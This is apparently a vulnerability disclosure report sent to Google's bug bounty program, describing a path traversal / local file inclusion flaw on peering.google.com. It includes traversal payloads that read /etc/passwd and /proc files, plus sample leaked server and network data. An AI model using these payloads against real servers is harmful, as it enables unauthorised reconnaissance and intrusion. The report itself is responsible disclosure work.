Summary: Local File Inclusion 'LFI' Vulnerability
Hi Google!
I found an Local File Inclusion 'LFI' Vulnerability in "Google's Edge Network".
Steps to reproduce:
Go to "
https://peering.google.com/"
.
Open any picture in another window for example: "
https://peering.google.com/static/images/couch-ipad.png"
Add one of this value at the end of the link: ("../../../../../../../etc/passwd") OR ("../../../../../../../proc/self/cmdline") OR ("../../../../../../../proc/self/stat") OR
("../../../../../../../proc/self/status").
In this way: "
https://peering.google.com/static/images/couch-ipad.png../../../../../../../proc/self/cmdline"
Now you are viewing sensitive information about the server.
PoC Video: "
https://www.youtube.com/watch?v=4QNSqiG53oU"
Browser/OS: Firefox/Chrome (windows 10).
Attack scenario:
Impacts of an Exploited Local File Inclusion Vulnerability
As it is known, the impacts of exploiting a Local File Inclusion (LFI) vulnerability vary from information disclosure to complete compromise of the system. Even in cases where the included code is not executed, it can still give an attacker enough valuable information to be able to compromise the system,As is the case of the security vulnerability we are reporting
The attacker gets information about the server and Kernel data. # (PoC: "/proc/version" OR "/proc/cpuinfo" OR "proc/meminfo")
Example leak data: "Linux version 3.11.10 #1 SMP"
The attacker gets information about the files on the server. # (PoC:"proc/self/cmdline")
Example leak data: "server_software=Google App Engine/1.9.69"
The attacker gets information about the internal network. # (PoC:"proc/self/cmdline")
Example leak data:"apihost_address=169.254.169.253:4 /server_address=169.254.8.2:5"
The attacker gets information about the operations and the time they run on the server. # (PoC:  "proc/self/stat")
Example leak data: "(python27g_runti)"
The attacker gets sensitive information about the operation processes and the ability of the system that can contribute well in measuring the size of denial of service attacks. # (PoC: "proc/self/status").
Example leak data: "FDSize: 11,  VmSize: 1134532 kB,  VmRSS: 134860 kB, Threads: 17"
The attacker gets statistics about the system and its files. # (PoC: "/proc/self/io").
Example leak data: "char: 3696441 wchar: 6431 syscr: 901 syscw: 53"
As you know a lot of commands that can be implemented and reviewed by attackers as long as the web server receives these requests and responds to them there will be more data leaks, and this poses a threat to the server.
Best Regards
Jafar Abu Nada